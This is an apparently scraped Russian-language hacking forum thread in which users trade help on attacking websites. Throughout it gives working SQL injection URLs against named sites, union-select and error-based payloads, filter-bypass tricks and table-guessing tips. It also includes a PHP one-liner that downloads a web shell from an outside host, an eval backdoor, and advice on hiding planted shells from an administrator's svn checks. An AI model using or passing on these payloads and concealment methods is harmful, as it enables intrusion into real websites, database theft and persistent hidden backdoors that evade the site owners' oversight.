PHP: file_put_contents($_GET[a], file_get_contents($_GET[b]));&a=wso.php&b=http://evilsite.ru/shell.txt
PHP: file_put_contents($_GET[a], file_get_contents($_GET[b]));&a=wso.php&b=http://evilsite.ru/shell.txt как ни старался не сработало Совсем забыл написать, в эксплойте используется такая конструкция PHP: <?php @eval(stripslashes($_REQUEST[c])); @die($_REQUEST[m]); ?> при попытке заменить ее на что либо другое, или матерится или выдает пустую страницу Никак не могу найти примера работы с stripslashes() везде написано что он удаляет экранирование символов но как его применить? К сожалению с php не очень дружу
есть скуля Code: http://www.feb.spb.ru/news.php?id=100+union+select+1,column_name,3,4,5,6,7+from+information_schema.columns+limit+1,1111-- хочу сдампить колонки БД с помощью программы rsaUnDumper[sql] 2.0.exe делаю все как положено но ничего не дампиться даже ошибки не выводятся просто выводится Пробовал запрос без --, пробовал удалять все что ниже -- безрезультатно А в ручную все идет нормально. Подскажите что я не так делаю? Ссылка на дампер http://www.sendspace.com/file/ee74kx
ыы самый тяжелый способ это подбирать ручками, например users, admins, members и т.д. Еще есть проги для подбора таблиц по словарям. можно поискать на форуме а вообще тут смотря к чему таблицы. Если к извесным форумам то таблицы извесны (если их не поменяли). Например таблица юзеров phpbb форума называется phpbb_users. Если это 5 версия Мускула или MSSQL то таблицы можно увидеть через information_schema.tables.
На серве стоит svn и админ почти ежедневно им пользуется. Мои шеллы и изменения на раз палятся командой svn status Как скрыться? пробовал svn add /path/to/shell.php (Вроде добавляет файл в снимок файловой системы) Все равно status показывает мои изменения.
Не уверен на 100%, но Сделать отдельную бранчу, в этой бранче сделать коммит шелла. В логах транка не должны светиться сие действия. Для верности в бранче сделать изменения во всех файлах (добавить по одной строке) и коммитить не шелл, а добавить строку выполнения команды.
собственно вопрос как узнать префикс таблиц в joomla? попалась инъекция mysql4 дефолтный jos не катит...
Что можно сделать если есть вот такая sql injection: Code: http://mirplombir.ru/index.php?searchstring=1\\%27%29%29or%28SELECT%28COUNT%28*%29%29FR%20%20OM%28%28SELECT%281%29%29UNION%28SELECT%282%29%29UNION%28SELECT%283%29%29%29x/**/GROUP/**/BY/**/MID%28VERSION%28%29,FLOOR%28RAND%280%29*2%29,64%29%29%23%20UNION%20SELECT%201%20--%20%20%27 При этом во время моих экспериментов часто перебрасывает на сайт хостера, где написано
name_const здесь не надо использовать в связи с ее особенностями на разных версиях маскула. Кроме констант ты ничего не выведешь, да и вопрос состоял в другом, а именно Это фильтрация на последовательность union select from Один из вариантов обхода Code: http://mirplombir.ru/index.php?news=2'and(0)union%0Aselect+version(),2,3+from+information_schema.tables--+
Удачно подобрал нужную таблицу в PostgreSQL, но вывести колонки не получается. Запрос: http://www.site.com/index.php?id=246+union+select+column_name+from+information_schema.columns+where+table_name=chr(106)||chr(111)||chr(115)||chr(95)||chr(117)||chr(115)||chr(101)||chr((114)||chr(115) -- Вывод: FUNCTION modx1.chr does not exist Судя по ошибке двиг "modx" и в нём нету по-умолчанию "char"; Запрос: http://www.site.com/index.php?id=246+union+select+column_name+from+INFORMATION_SCHEMA.columns+where+TABLE_name=jos_users-- Вывод: Unknown column 'jos_users' in 'where clause' В чём моя ошибка? Как вывести колонки из таблицы jos_users ?
Привет, есть вопрос по заливке шелла через error based sqli. Допустим есть запрос вида: Code: index.php?id=1+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat((SELECT+USER()),floor(rand(0)*2)))+--+ Code: Duplicate entry 'root@localhost1' for key 1 Так вывожу имена таблиц: Code: [code]?id=1+or+(select+count(*)+from+(select+1+ union+select+2+union+select+3)x+group+by+concat((SELECT+TABLE_NAME+FROM+information_schema.tables+LIMIT+0,1),floor(rand(0)*2)))+--+ [/code]Путь известен. Как действовать дальше? Да чуть не забыл, соль в том, что mq=on.
